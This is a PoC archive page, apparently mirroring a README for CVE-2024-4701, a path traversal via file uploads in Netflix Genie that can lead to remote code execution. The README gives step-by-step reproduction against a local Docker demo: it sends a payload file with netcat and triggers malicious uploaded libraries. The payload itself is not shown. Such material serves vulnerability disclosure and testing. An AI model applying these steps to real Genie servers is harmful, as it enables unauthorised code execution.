Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2024-4701 PoC — Path Traversal vulnerability via File Uploads in Genie

Source
Associated Vulnerability
Title: Path Traversal vulnerability via File Uploads in Genie (CVE-2024-4701)
Description:A path traversal issue potentially leading to remote code execution in Genie for all versions prior to 4.3.18
Description
POC for CVE-2024-4701
Readme
# CVE-2024-4701-POC
POC for CVE-2024-4701

Download the genie docker file from https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml or this repo

run 

```docker-compose up```

Download the attached http payload loadlib 

Run the following command

```nc -w 5 localhost 8080 < loadlib```
You may need to install netcat ( nc )

This will send the payload to the genie app running in docker, which uploads the pe.so and ld.so.upload files.

Then login to the genie-app docker container

```docker exec -it genie_demo_app_4.3.0 /bin/bash```

The act of logging in triggers the execution of the malicious library, so just then run

ls /tmp/

To see the file command.out written to disk.

File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →